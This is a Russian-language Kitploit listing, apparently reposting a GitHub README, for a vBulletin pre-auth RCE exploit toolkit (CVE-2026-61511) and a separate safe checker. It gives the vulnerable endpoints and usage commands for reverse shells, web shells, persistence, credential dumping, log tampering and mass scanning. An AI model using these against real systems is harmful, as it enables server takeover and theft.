Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Уязвимость 5.x/6.x (без патча). Мультиэксплойт через Endpoint Pool, AJAX, обход WAF с помощью PHPFuck. Полный набор инструментов: reverse shell, прокси, персистентность, веб-шелл, операции с базой данных, контроль брандмауэра, управление журналами, массовое сканирование. 2 версии: мультиэксплойт и безопасная проверка. Python 3.8+ Используйте этично, оставайтесь в рамках закона. 🔒 | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Картирование сетиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияОбход WAFТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Безопасность Баз Данных
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Репозиторий
4101 месяц назадЕщё не проверено

Описание

CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Уязвимость 5.x/6.x (без патча). Мультиэксплойт через Endpoint Pool, AJAX, обход WAF с помощью PHPFuck. Полный набор инструментов: reverse shell, прокси, персистентность, веб-шелл, операции с базой данных, контроль брандмауэра, управление журналами, массовое сканирование. 2 версии: мультиэксплойт и безопасная проверка. Python 3.8+ Используйте этично, оставайтесь в рамках закона. 🔒

Поделиться

CVEPoC

CVE-2026-61511 – Эксплойт и верификатор Pre-Auth RCE для vBulletin

Python 3.8+ CVSS Author vBulletin

⚠️ ТОЛЬКО ДЛЯ ЭТИЧЕСКОГО ИСПОЛЬЗОВАНИЯ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Этот репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, синих команд и пентестеров.
Несанкционированный доступ к компьютерным системам незаконен в соответствии с CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичными законами по всему миру.


📖 Обзор уязвимости

CVE‑2026‑61511 — это уязвимость внедрения PHP eval() в AJAX-движке рендеринга шаблонов vBulletin.
Затронутые версии: 5.0.0 – 5.7.5 и 6.0.0 – 6.2.1.

Как это работает

  1. Несколько конечных точек атаки – ошибка существует в нескольких AJAX-обработчиках:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Различные конечные точки /ajax/api/content_* /getIndexableContent
  2. Кодирование PHPFuck – полезная нагрузка преобразуется в последовательность операторов PHP и чисел, которая обходит WAF-фильтры и позволяет выполнять произвольный PHP-код.

  3. Аутентификация не требуется – злоумышленник может отправить специально сформированный POST-запрос на любую уязвимую конечную точку и выполнять системные команды с привилегиями веб-сервера.

  4. Воздействие – полный компрометация сервера, кража данных, бэкдоры, горизонтальное перемещение и закрепление. Обновите версию!

Патч

  • vBulletin 6.2.2 и Patch Level 1 для старых версий исправляют эту проблему.
  • Всегда обновляйтесь до последней версии.

🧰 Инструменты

ИнструментНазначениеЦелевой пользователь
exploit.pyПолный набор инструментов с обратной оболочкой, закреплением, файловыми операциями, дампом базы данных, управлением брандмауэром, управлением журналами, пробросом портов, развертыванием SSH-ключей, сетевым сканированием и массовым сканированием (многопоточным).

📊 Сравнение функций


🎯 Сводка вариантов использования


⚙️ Установка

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

Содержимое requirements.txt:

root@kitploit:~
request
urllib3

Параметры 🌬️

Сценарии

Пул конечных точек 🅿️

🛡️ Ответственное использование

  • Используйте эти инструменты только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
  • Несанкционированный доступ незаконен и неэтичен.
  • Авторы не несут ответственности за любое неправомерное использование.
  • Всегда соблюдайте законы и нормативные акты вашей страны.

Это программное обеспечение предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Скачать инструмент
Красные команды / авторизованные пентестеры
safecheck.pyНеинтрузивный верификатор, который проверяет уязвимость без выполнения каких-либо вредоносных нагрузок. Определяет версию, тестирует все конечные точки и генерирует подробный отчет.Синие команды / аудиторы безопасности
Функцияexploit.pysafecheck.py
Обнаружение уязвимости✅✅
Определение версии✅✅
Тестирование нескольких конечных точек (18 путей)✅✅
Выполнение команд✅❌
Обратная оболочка✅❌
Загрузка/скачивание файлов✅❌
Механизмы закрепления✅❌
Развертывание веб-оболочки✅❌
Операции с базой данных✅❌
Сбор информации о системе✅✅
Управление брандмауэром✅❌
Управление журналами✅❌
Проброс портов✅❌
Развертывание SSH-ключей✅❌
Сетевое сканирование✅❌
Массовое сканирование (многопоточное)✅❌
Поддержка прокси✅✅
Вывод JSON-отчета✅✅
Интерактивное меню✅❌
Неинтрузивный (безопасный) режим❌✅
Режим Verbose/Debug✅✅
Выполнение пользовательских команд✅❌
Объединение нескольких команд✅❌
Чтение удаленных файлов✅❌
Запись удаленных файлов✅❌
Управление системными пользователями✅❌
Методы обхода брандмауэра✅❌
Обход WAF (PHPFuck)✅✅
СценарийРекомендуемый инструмент
Синяя команда – проверка, уязвима ли ваша установка vBulletinsafecheck.py
Аудит безопасности – неинтрузивная оценка уязвимостейsafecheck.py
Красная команда – авторизованное пентестирование с полной эксплуатациейexploit.py
Bug Bounty – тестирование с ответственным раскрытиемsafecheck.py
Массовое сканирование – проверка нескольких целей на уязвимостьexploit.py (только обнаружение)
Реагирование на инциденты – проверка, скомпрометированы ли системыsafecheck.py
ПараметрОписание
-t, --targetURL цели (например, http://forum.com/vb)
--proxyHTTP-прокси (например, http://127.0.0.1:8080)
--timeoutТаймаут запроса в секундах (по умолчанию: 10)
--retryКоличество повторов на путь (по умолчанию: 3)
--outputСохранить подробный отчет в JSON-файл
-v, --verboseПодробный вывод
-q, --quietТихий режим (минимальный вывод)
--lhostОбязательно для эксплойта – IP для обратного вызова
--lportПорт для обратного вызова (по умолчанию: 4444)
--threadsПотоки для массового сканирования (по умолчанию: 5)
--exploitВыполнить эксплуатацию после обнаружения
--fullПолная атака (все модули)
--shellЗапустить обратную оболочку
--webshellУстановить веб-оболочку (/shell.php)
--persistУстановить закрепление (cron-задание)
--dumpСделать дамп базы данных
--dump-credsСделать дамп учетных данных (/etc/passwd, /etc/shadow)
--interactiveИнтерактивное меню после успешной проверки
#СценарийКоманда
1Быстрая проверка уязвимостиpython safecheck.py -t http://target.com/vb
2Детальное сканирование с отчетомpython safecheck.py -t http://target.com/vb --output report.json -v
3Обратная оболочкаpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Полная атака (все модули)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Массовое сканирование из файлаpython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Режим интерактивного менюpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#Конечная точка
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent